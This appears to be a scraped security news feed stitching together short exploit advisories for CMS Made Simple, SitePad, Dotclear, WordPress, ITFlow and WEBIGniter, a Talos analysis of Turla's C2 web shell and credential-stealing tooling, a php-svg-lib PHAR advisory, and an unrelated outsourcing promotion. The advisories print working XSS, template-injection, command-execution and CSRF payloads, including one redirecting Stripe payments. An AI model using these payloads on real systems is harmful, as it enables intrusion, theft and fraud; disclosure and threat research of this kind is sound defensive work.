CMS Made Simple version 2.2.19 suffers from a server-side template injection vulnerability.

    # Exploit Title: CMS Made Simple Version: 2.2.19 - SSTI# Date: 2024-21-02# Exploit Author: tmrswrr# Vendor Homepage: https://www.cmsmadesimple.org/# Version: 2.2.19# Tested on: https://www.softaculous.com/demos/CMS_Made_Simple1 ) log in as admin and go to Layout > Design Manager > Breadcrumbs2 ) Click edit and write SSTI payload : {7*7} , {$smarty.version},{{7*7}}    3 ) After click Apply > Submit4 ) Go to home page > https://127.0.0.1/CMS_Made_Simple/index.php?page=templates-and-stylesheetswill be see : 49 class="breadcrumbs"

CMS Made Simple 2.2.19 Server-Side Template Injection

CMS Made Simple version 2.2.19 suffers from a remote code execution vulnerability.

    # Exploit Title: CMS Made Simple Version: 2.2.19 - Remote Code Execution# Date: 2024-21-02# Exploit Author: tmrswrr# Vendor Homepage: https://www.cmsmadesimple.org/# Version: 2.2.19# Tested on: https://www.softaculous.com/demos/CMS_Made_Simple1 ) log in as admin and go to Extensions > User Defined Tags >2 ) Write in Code place payload > <?php echo system('id'); ?>3 ) After click run you will be see result :uid=1000(admin) gid=1000(admin) groups=1000(admin) uid=1000(admin) gid=1000(admin) groups=1000(admin)

CMS Made Simple 2.2.19 Remote Code Execution

SitePad version 1.8.2 suffers from a persistent cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: SitePad Version : 1.8.2 - Stored XSS # Date: 2024-21-02# Exploit Author: tmrswrr# Vendor Homepage: https://sitepad.com/# Version : 1.8.2# Tested on: https://www.softaculous.com/apps/blogs/SitePad1 ) Go to Templates > Header > Edit Pagelayer Template2 ) Write in Name : "><img src=x onerrora=confirm() onerror=confirm(1)>3) After save and refresh page will be see alert button https://127.0.0.1/SitePad/site-admin/admin.php?page=pagelayer_template_wizard&post=9

SitePad 1.8.2 Cross Site Scripting

Dotclear version 2.29 suffers from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: Dotclear Version : 2.29 - Reflected XSS # Date: 2024-21-02# Exploit Author: tmrswrr# Vendor Homepage: https://dotclear.org/# Version : 2.29# Tested on: https://softaculous.com/demos/dotclear1 ) Enter admin panel after write search button this payload : "><img src=x onerrora=confirm() onerror=confirm(1)>2 ) https://127.0.0.1/Dotclear/admin/index.php?qx="><img src=x onerrora=confirm() onerror=confirm(1)>&process=Search3 ) You will be see alert button

Dotclear 2.29 Cross Site Scripting

Cisco Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT. New findings from Talos illustrate the inner workings of the command and control (C2) scripts deployed on the compromised WordPress servers utilized in the compromise we previously disclosed.

*   Cisco Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT. New findings from Talos illustrate the inner workings of the command and control (C2) scripts deployed on the compromised WordPress servers utilized in the compromise we previously disclosed.

*   Talos also illustrates the post-compromise activity carried out by the operators of the TinyTurla-NG (TTNG) backdoor to issue commands to the infected endpoints. We found three distinct sets of PowerShell commands issued to TTNG to enumerate, stage and exfiltrate files that the attackers found to be of interest.

*   Talos has also discovered the use of another three malicious modules deployed via the initial implant, TinyTurla-NG, to maintain access, and carry out arbitrary command execution and credential harvesting.

*   One of these components is a modified agent/client from Chisel, an open-sourced attack framework, used to communicate with a separate C2 server to execute arbitrary commands on the infected systems.

*   Certificate analysis of the Chisel client used in this campaign indicates that another modified chisel implant has likely been created that uses a similar yet distinct certificate. This assessment is in line with Turla’s usage of multiple variants of malware families including TinyTurla-NG, TurlaPower-NG and other PowerShell-based scripts during this campaign.

Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT in the compromise we’ve previously disclosed. The continued investigation also revealed details of the inner workings of the C2 scripts including handling of incoming requests and a WebShell component that allows the operators to administer the compromised C2 servers remotely.

**C2 server analysis**

The command and control (C2) code is a PHP-based script that serves two purposes: It’s a handler for the TinyTurla-NG implants and web shell that the Turla operators can use to execute commands on the compromised C2 server. The C2 scripts obtained by Talos are complementary to the TinyTurla-NG (TTNG) and TurlaPower-NG implants and are meant to deliver executables and administrative commands to execute on infected systems.

On load, the PHP-based C2 script will perform multiple actions to create the file structure used to serve the TTNG backdoor. After receiving a request, the C2 script first checks if the logging directory exists, if not, it will create one. Next, the script checks for a specific COOKIE ID. If it exists and corresponds to the hardcoded value, then the C2 script will act as a web shell.

It will base64 decode the value of the $\_COOKIE (not to be confused with the authentication COOKIE ID) entry and execute it on the C2 server as a command. These commands are either run using the exec(), passthru(), system(), or shell\_exec() functions. It will also check if the variable specified is a resource and read its contents. Once the actions are complete, the output or resource is sent to the requestor and the PHP script will stop executing.

C2 script’s web shell capability.

If there is an “id” provided in the HTTP request to the C2 server, the script will treat this as communication with an implant, such as TTNG or TurlaPower-NG. The “id” parameter is the same variable that is passed by the TTNG and TurlaPower-NG implants during communication with the C2 and creates the logging directory on the C2 server, as well. Depending on the next form value accompanying the “id”, the C2 will perform the following actions:

*   "**task**": Write the content sent by the requestor to the “<id>/tasks.txt” file and record the requestor’s IP address and timestamp in the “<id>/\_log.txt”. The contents of this file are then sent to the requestor in response to the “gettask” request. This mechanism is used by the attackers to add more tasks to the list of tasks/commands that each C2 must send to their backdoor installations to execute on the infected endpoints.

*   "**gettask**": Send the contents of the “<id>/tasks.txt” file to the infected system requesting a new command to execute on the infected endpoint.

*   "**result**": Get the content of the HTTP(S) form and record it into the “<id>/result.txt” file. The C2 uses this mechanism to obtain and record the output of a command executed on an infected endpoint by the TTNG backdoor into a file on disk.

*   "**getresult**": Get the contents of the “<id>/result.txt” file from the C2 server. The adversaries use this to obtain the results of a command executed on the infected endpoint without having to access the C2 server.

*   "**file**" + "**name**": Save the contents of the file sent to the C2 server either in full or part to a file specified on the C2 server with the same “name” specified in the HTTP form.

*   "**cat\_file**": Read the contents of a file specified by the requestor on the C2 server and respond with the contents.

*   "**rm\_file**": Remove/delete a file specified by the requestor from the C2 server.

The C2 script’s request handling logic.

The HTTP form values accepted by the C2 server “task”, “cat\_file”, “rm\_file”, “get\_result” and their corresponding operations on the C2 server indicate that these are part of an operational apparatus that allows the threat actors to feed the C2 server new commands and retrieve valuable information collected by the C2 server, _from a remote location_, without having to log into the C2 itself. Operationally, this is a tactic that is beneficial to the threat actors considering that all C2 servers discovered so far are websites compromised by the threat actor instead of being attacker-owned. Therefore, it would be beneficial for Turla’s operators to simply communicate over HTTPS masquerading as legitimate traffic instead of re-exploiting or accessing the servers through other means such as SSH thereby increasing their fingerprint on the compromised C2 servers.

This tactic can be visualized as:

**Instrumenting TinyTurla-NG to carry out post-compromise activity**

The adversaries use TinyTurla-NG to perform additional reconnaissance to enumerate files of interest on the infected endpoints and then exfiltrate these files. They issued three distinct sets of modular PowerShell commands to TTNG:

*   **Reconnaissance commands:** Used to enumerate files in a directory specified by the operator. The directory listing is returned to the operator to select interesting files that can be exfiltrated.

PowerShell script/Command enumerates files in four locations specified by the C2 and sends the results back to it.

*   **Copy file commands:** Base64-encoded commands/scripts issued to the infected systems to copy over files of interest from their original location to a temporary directory, usually: C:\\windows\\temp\\

PowerShell script copies files to an intermediate location.  

*   **Exfiltration** **commands/scripts aka TurlaPower-NG:** These scripts were used to finally exfiltrate the selected files to the C2 servers.

The scripts used during enumeration, copying and exfiltration tasks contain hardcoded paths for files and folders of interest to Turla. These locations consisted of files and documents that were used and maintained by Polish NGOs to conduct their day-to-day operations. The actors also used these scripts to exfiltrate Firefox profile data, reinforcing our assessment that Turla made attempts to harvest credentials, along with data exfiltration.

While Tinyturla-NG itself is enough to perform a variety of unauthorized actions on the infected system using a combination of scripts described above, the attackers chose to deploy three more tools to aid in their malicious operations:

*   Chisel: Modified copy of the Chisel client/agent.

*   Credential harvesting scripts: PowerShell-based scripts for harvesting Google Chrome or Microsoft Edge’s saved login data.

*   Tool for executing commands with elevated privileges: A binary that is meant to impersonate privilege levels of a specified process while executing arbitrary commands specified by the parent process.

The overall infection activity once TTNG has been deployed looks like this:

**Using Chisel as another means of persistent access**

Talos’ investigation uncovered that apart from TurlaPower-NG, the PowerShell-based file exfiltrator, the adversary also deployed another implant on infected systems. It’s a modified copy of the GoLang-based, open-source tunneling tool Chisel stored in the location: C:\\Windows\\System32\\TrustedWorker\[.\]exe

The modified Chisel malware is UPX compressed, as is common for Go binaries, and contains the C2 URL, port and communication certificate, and private keys embedded in the malware sample. Once it decrypts these artifacts, it continues to create a reverse SOCKS proxy connection to the C2 using the configuration: R:5000:socks

In the proxy:

*   **“R”:** Stands for remote port forwarding.
*   **“5000”**: This is the port on the attacker machine that receives the connection from the infected system.
*   **“socks”**: Specifies the usage of the SOCKS protocol. 

(The default local host and port for a socks remote in Chisel is 127\[.\]0\[.\]0\[.\]1:1080)

The C2 server that the chisel sample contacts is: 91\[.\]193\[.\]18\[.\]120:443.

The TLS configuration consists of a client TLS certificate and key pair. The certificate is valid from between Dec. 7, 2023 and Dec. 16, 2024. This validity falls in line with Talos’ assessment that the campaign began in December 2023. The issuer of the certificate is named as “dropher\[.\]com” and the subject name is “blum\[.\]com”.

TLS Certificate for the chisel malware used by Turla. 

During our data analysis, we found another certificate which we assessed with high confidence was also generated by Turla operators, but it's unclear if this was a mistake or they intended for the certificate to be used on another modified chisel implant. 

Certificate issuer DN.

The new certificate has the same issuer but in this case, the common name is _blum\[.\]com_ and the serial number is 0x1000. This certificate was generated one second before the one used in the modified chisel client/agent.

Turla also deployed two more tools to aid their malicious operations on the infected systems. One is used to run arbitrary commands on the system and the other is used to steal Microsoft Edge browser’s login data.

The first tool is a small and simple Windows executable to create a new command line process on the system by impersonating the privilege level of another existing process. The tool will accept a target Process Identifier (PID) representing the process whose privilege level is to be impersonated and the command line that needs to be executed. Then, a new cmd\[.\]exe is spawned and used to execute arbitrary commands on the infected endpoint. The binary was compiled in early 2022 and was likely used in previous campaigns by Turla.

The tool contains the embedded cmd\[.\]exe command line.

The second tool discovered by Talos is a PowerShell script residing at the location:

C:\\windows\\system32\\edgeparser.ps1

This script is used to find  login data from Microsoft Edge located at:

%userprofile%\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data

This data file and the corresponding decryption key for the login data extracted from the endpoint is archived into a ZIP file and stored in the directory: C:\\windows\\temp\\<filename>.zip

The script can be used to obtain credentials for Google Chrome as well but has been modified to parse login data from:

%userprofile%\\AppData\\Local\\Microsoft\\Edge

PowerShell script obtaining key and login data to add to the archive for exfiltration.

TTNG uses the privilege elevation tool to run the PowerShell script using the command:

"C:\\Windows\\System32\\i.exe" \_PID\_ "powershell -f C:\\Windows\\System32\\edgeparser.ps1"

This results in the tool spawning a new process with the command line:

C:\\Windows\\System32\\cmd.exe /c "powershell -f C:\\Windows\\System32\\edgeparser.ps1"

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

**IOCS**

IOCs for this research can also be found at our GitHub repository here.

**Hashes**

267071df79927abd1e57f57106924dd8a68e1c4ed74e7b69403cdcdf6e6a453b  
d6ac21a409f35a80ba9ccfe58ae1ae32883e44ecc724e4ae8289e7465ab2cf40  
ad4d196b3d85d982343f32d52bffc6ebfeec7bf30553fa441fd7c3ae495075fc  
13c017cb706ef869c061078048e550dba1613c0f2e8f2e409d97a1c0d9949346  
b376a3a6bae73840e70b2fa3df99d881def9250b42b6b8b0458d0445ddfbc044

**Domains**

hanagram\[.\]jp  
thefinetreats\[.\]com  
caduff-sa\[.\]ch  
jeepcarlease\[.\]com  
buy-new-car\[.\]com  
carleasingguru\[.\]com

**IP Addresses**

91\[.\]193\[.\]18\[.\]120

TinyTurla-NG in-depth tooling and command and control analysis

By Uzair Amir
Eastern Europe is swiftly rising to prominence in the software development outsourcing sector. This ascendance is marked not…
This is a post from HackRead.com Read the original post: Top Software Development Outsourcing Trends

Eastern Europe is swiftly rising to prominence in the software development outsourcing sector. This ascendance is marked not only by its combination of cost-effectiveness and 1.3 million unparalleled talent but also by the attention it’s receiving from major companies.

Tech giants such as Google, Apple, Microsoft, and successful startups like Spotify and Slack have recognized the potential and established developer teams in the region. And what is the key to the successful establishment of a software development team in Eastern Europe?

At Alcor, we specialize in IT recruitment in EE and Latin America, concentrating primarily on middle, senior, and C-level positions. We cater to IT product companies eager to hire talent from countries like Poland, Romania, and other parts of Eastern Europe. Our commitment to bridging talent needs has positioned us as a go-to for organizations keen on leveraging the region’s tech expertise.

For a more comprehensive insight into IT outsourcing to Eastern Europe, read this article that provides a deeper dive into the region’s growing significance.

****Eastern Europe: The Undisputed IT Outsourcing Hub****

Projected global IT spending is set to reach an astonishing $4.5 trillion by 2023, as per Gartner’s recent forecast. This elevates the importance for businesses to derive maximum value from every penny spent. Validating this trend, 60% of technology companies are turning towards outsourcing partners for a certain portion of their software development needs.

While India and China have been historical leaders in IT outsourcing, there’s a notable drift towards Eastern Europe. This is driven by various factors, chief among them being the pressing concerns over Intellectual Property Rights in countries like China, accompanied by communication barriers and significant time differences. According to a comprehensive study, the Eastern European IT industry is set to grow annually by 7.84%, reaching an impressive $15.70bn by 2027. 

Several factors contribute to this shift:

*   Quality Over Quantity: Eastern Europe is gaining traction due to its emphasis on quality, ensuring that projects aren’t just completed but stand out in a competitive global market.
*   Cultural and Temporal Proximity: Eastern Europe’s closeness to Western European and North American markets means fewer time zone issues and cultural barriers. This streamlines communication and ensures smoother project executions.
*   Educated Workforce: Having over 300 higher education institutions that provide STEM programs (most of which are among the QS World University Rankings 2023), the region has plenty of highly qualified software developers.

But, what are the most significant software development trends in EE?

****A Flourishing IT Landscape in Eastern Europe****

Eastern Europe, encompassing nations such as Poland, Romania, Ukraine, Czech Republic, Hungary, Slovakia, Bulgaria, and Estonia, is swiftly emerging as a heavyweight in the international IT arena. The region’s allure is grounded in a blend of advantageous tax regimes, burgeoning IT advancements, and a vast reservoir of adept professionals. Initiatives from governments, like backing for startups and the proliferation of tech parks and innovation centers, amplify this attraction, spotlighting Eastern Europe as a potential IT powerhouse.

However, it’s the region’s multifaceted technical prowess that truly differentiates it. Poland, for example, is distinguished for its expertise in languages like JavaScript, Java, Python, and TypeScript. Romania excels with skills in PHP, C#, Java, and C++. The Czech Republic showcases deep knowledge in areas such as JavaScript, Java, PHP, and C#. Neighbouring countries like Hungary and Slovakia further enrich the tech tapestry, with commendable skills in areas spanning JavaScript, HTML/CSS, Python, Java, and PHP.

****Understanding the Tax Landscape: Poland, Romania, Bulgaria, and Ukraine****

Bulgaria stands out with its straightforward tax system. Both corporate and personal income taxes are set at a uniform rate of 10%. This simplicity is attractive to many businesses and professionals looking for clarity in fiscal matters.

Poland presents a more nuanced tax structure. CIT is typically 19%, but a reduced rate of 9% is available for smaller entities, barring certain exceptions. Individuals, on the other hand, pay 12% for income up to PLN 120,000. Beyond this threshold, they’re taxed at 32%. Additionally, high earners with an income surpassing PLN 1 million face a solidarity surcharge of 4%.

In Romania, companies face a corporate tax of 16%, while individuals are charged a 10% personal income tax. Ukraine, meanwhile, sets its corporate tax at 18%. The personal income tax is relatively low, standing at 5% for the majority, though there are specific exceptions to this rate.

****Prioritizing Cybersecurity in Outsourcing****

In an age where data breaches and cyber threats loom large, outsourcing shouldn’t be just about getting the job done but also about ensuring it’s done securely. However, IT outsourcing does not always let businesses reach complete security. There are cases when clients risk or even lose their intellectual property rights if they don’t sign an IT rights transfer agreement with their IT outsourcing firm. If they cooperate with IT recruitment or R&D providers, though, this never happens. Meanwhile, Eastern Europe, with its strong emphasis on IT education and rigorous data protection laws (GDPR), ensures that businesses aren’t just given quality work but also the peace of mind that their data remains secure.

****The Talent Over Cost Paradigm****

Although affordability is a compelling consideration, the genuine essence of value is in work quality. In the corporate realm, there’s an escalating recognition that, while trimming expenses is advantageous, skimping on talent could have long-term repercussions. This mindset is evident in Eastern Europe’s recruitment strategies, emphasizing the skills and versatility of professionals over mere hourly compensation.

Moreover, IT recruitment & R&D services companies like Alcor are setting the gold standard in IT recruitment services. Prioritizing talent ensures a symbiotic relationship where businesses get top-tier solutions, and developers get a conducive environment that nurtures their skills.

Such vendors offer IT businesses access to pre-vetted talents with their guarantee of quick and efficient hiring. Plus, software developers hired via such agencies go through a pre-screening interview stage, which boosts the overall quality of candidates. Such practices ensure businesses stay ahead of technological advances and market demands.

****Navigating the IT Talent Retention Challenge****

The global IT landscape isn’t just grappling with the complexities of outsourcing; it’s contending with a deeper issue of employee retention. As highlighted by a recent Gartner survey, a mere 29% of IT professionals express a solid intention to stick with their current roles. In the outsourcing model, frequent project shifts can sometimes make developers feel detached, leading to a decreased perception of value in their work. This transience often prompts them to seek new job opportunities.

Conversely, product-based companies tend to have a different dynamic. Here, developers aren’t just part of the solution-making process but are integral to business growth. Their roles and contributions directly influence their career trajectories and earnings. This sense of purpose and alignment with the company’s growth often translates to higher job satisfaction and longer tenure.

Top Software Development Outsourcing Trends

### Summary
php-svg-lib fails to validate that font-family doesn't contain a PHAR url, which might leads to RCE on PHP < 8.0, and doesn't validate if external references are allowed. This might leads to bypass of restrictions or RCE on projects that are using it, if they do not strictly revalidate the fontName that is passed by php-svg-lib.

### Details
The Style::fromAttributes(), or the Style::parseCssStyle() should check the content of the `font-family` and prevents it to use a PHAR url, to avoid passing an invalid and dangerous `fontName` value to other libraries. The same check as done in the Style::fromStyleSheets might be reused : 

```
                if (
                    \array_key_exists("font-family", $styles)
                    && (
                        \strtolower(\substr($this->href, 0, 7)) === "phar://"
                        || ($this->document->allowExternalReferences === false && \strtolower(\substr($this->href, 0, 5)) !== "data:")
                    )
                ) {
                    unset($style["font-family"]);
                }
```

### PoC 

Parsing the following SVG : 

```
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
    <text x="20" y="35" style="color:red;font-family:phar:///path/to/whatever.phar/blaklis;">My</text>
</svg>
```

will pass the `phar:///path/to/whatever.phar/blaklis` as `$family` in `SurfaceCpdf::setFont`, which is then passed to the canvas `selectFont` as a `$fontName`.

### Impact
Libraries using this library as a dependency might be vulnerable to some bypass of restrictions, or even RCE, if they do not double check the value of the `fontName` that is passed by php-svg-lib

**Summary**

php-svg-lib fails to validate that font-family doesn't contain a PHAR url, which might leads to RCE on PHP < 8.0, and doesn't validate if external references are allowed. This might leads to bypass of restrictions or RCE on projects that are using it, if they do not strictly revalidate the fontName that is passed by php-svg-lib.

**Details**

The Style::fromAttributes(), or the Style::parseCssStyle() should check the content of the font-family and prevents it to use a PHAR url, to avoid passing an invalid and dangerous fontName value to other libraries. The same check as done in the Style::fromStyleSheets might be reused :

                    if (
                        \array_key_exists("font-family", $styles)
                        && (
                            \strtolower(\substr($this->href, 0, 7)) === "phar://"
                            || ($this->document->allowExternalReferences === false && \strtolower(\substr($this->href, 0, 5)) !== "data:")
                        )
                    ) {
                        unset($style["font-family"]);
                    }
    

**PoC**

Parsing the following SVG :

    <?xml version="1.0" encoding="UTF-8" standalone="no"?>
    <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
        <text x="20" y="35" style="color:red;font-family:phar:///path/to/whatever.phar/blaklis;">My</text>
    </svg>
    

will pass the phar:///path/to/whatever.phar/blaklis as $family in SurfaceCpdf::setFont, which is then passed to the canvas selectFont as a $fontName.

**Impact**

Libraries using this library as a dependency might be vulnerable to some bypass of restrictions, or even RCE, if they do not double check the value of the fontName that is passed by php-svg-lib

**References**

*   GHSA-f3qr-qr4x-j273
*   dompdf/php-svg-lib@732faa9
*   dompdf/php-svg-lib@8ffcc41

GHSA-f3qr-qr4x-j273: php-svg-lib lacks path validation on font through SVG inline styles 

WordPress versions 6.4.3 and below appear to suffer from a REST API related username disclosure vulnerability.

    # Title: wordpress 6.4.3 - Username Disclosure# Author: h4shur# date:2024-02-21# Vendor Homepage: https://www.wordpress.org# Software Link: https://www.wordpress.org/download# Version:  6.4.3 and earlier# Tested on: Windows 10 & Google Chrome# Category : Web Application Bugs### Description :the REST API allows simulating different request types. As such, we canperform a POST request with the “users” string in the body of the request,and tell the REST API to act like it’s received a GET request.You can see the management username in the "slug" feature. And evensecurity plugins like "iThemes Security" do not block this path.### POC :https://target.com/wp-json/?rest_route=/wp/v2/users/# output :[{"id":1,"name":"admin","url":"https:\/\/target.com","description":"","link":"https:\/\/target.com\/?author=1","slug":"admin_1l","avatar_urls":{"24":"https:\/\/secure.gravatar.com\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=24&d=mm&r=g","48":"https:\/\/secure.gravatar.com\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=48&d=mm&r=g","96":"https:\/\/secure.gravatar.com\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"https:\/\/target.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"collection":[{"href":"https:\/\/target.com\/index.php?rest_route=\/wp\/v2\/users"}]}}]### Admin Panel :https://target.com/wp-adminhttps://target.com/login.php### contact :h4shursec@gmail.comtwitter.com/h4shurinstagram.com/h4shurt.me/h4shur

WordPress 6.4.3 Username Disclosure

ITFlow versions prior to commit 432488eca3998c5be6b6b9e8f8ba01f54bc12378 suffer from a cross site request forgery vulnerability.

    # CVE: CVE-2024-25344# CWE: CWE-352# Vendor: ITFlow.org# Affected product: ITFlow - Before commit 432488eca3998c5be6b6b9e8f8ba01f54bc12378# Discoverer: stehled, WP-Pomoc.cz# Attack-Type: Remote# AV: Admin user has to open a page, provided by an attacker, which will then perform malicious request changing system settings.Open source ITFlow was vulnerable to CSRF prior commit 432488eca3998c5be6b6b9e8f8ba01f54bc12378This vulnerability allowed an attacker to change system settings such as online payment information and Microsoft Azure SSO credentials.If admin user is logged in, we can, using provided PoC redirect him to post.php endpoint and make changes to the system. PoC below makes changes to Stripe related settings, which will lead to attacker receiving payments made through the system.<html><form enctype="multipart/form-data" method="POST" action="https://demo.itflow.org/post.php">    <table>        <tr><td>edit_online_payment_settings</td><td><input type="text" value="" name="edit_online_payment_settings"></td></tr>        <tr><td>config_stripe_enable</td><td><input type="text" value="1" name="config_stripe_enable"></td></tr>        <tr><td>config_stripe_publishable</td><td><input type="text" value="csrf-poc" name="config_stripe_publishable"></td></tr>        <tr><td>config_stripe_secret</td><td><input type="text" value="csrf-poc-secret" name="config_stripe_secret"></td></tr>        <tr><td>config_stripe_account</td><td><input type="text" value="1" name="config_stripe_account"></td></tr>    </table>    <input type="submit" value="https://demo.itflow.org/post.php"></form></html># Referencehttps://itflow.org/https://github.com/itflow-org/itflow/commit/432488eca3998c5be6b6b9e8f8ba01f54bc12378https://github.com/itflow-org/itflow/commit/8068cb6081e4760860a634c1066b2c64d0ee2d46

ITFlow Cross Site Request Forgery

WEBIGniter version 28.7.23 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WEBIGniter v28.7.23 Stored Cross Site Scripting (XSS)# Exploit Author: Sagar Banwa# Date: 19/10/2023# Vendor: https://webigniter.net/# Software: https://webigniter.net/demo# Reference: https://portswigger.net/web-security/cross-site-scripting# Tested on: Windows 10/Kali Linux# CVE : CVE-2023-46391Stored Cross-site scripting(XSS):Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.Steps-To-Reproduce:1. Login to the Account 2. Go to the Categories.3. Now add catagory > Name section use payload : "><script>alert(1)</script> and choose layoutfile as cat.phpRequest POST /cms/categories/add HTTP/2Host: demo.webigniter.netCookie: ci_session=iq8k2mjlp2dg4pqa42m3v3dn2d4lmtjb; hash=6ROmvkMoHKviB4zypWJXmjIv6vhTQlFw6bdHlRjXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 94Origin: https://demo.webigniter.netReferer: https://demo.webigniter.net/cms/categories/addUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersname=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&slug=scriptalert1script&layout_file=cat.php

Tag

#php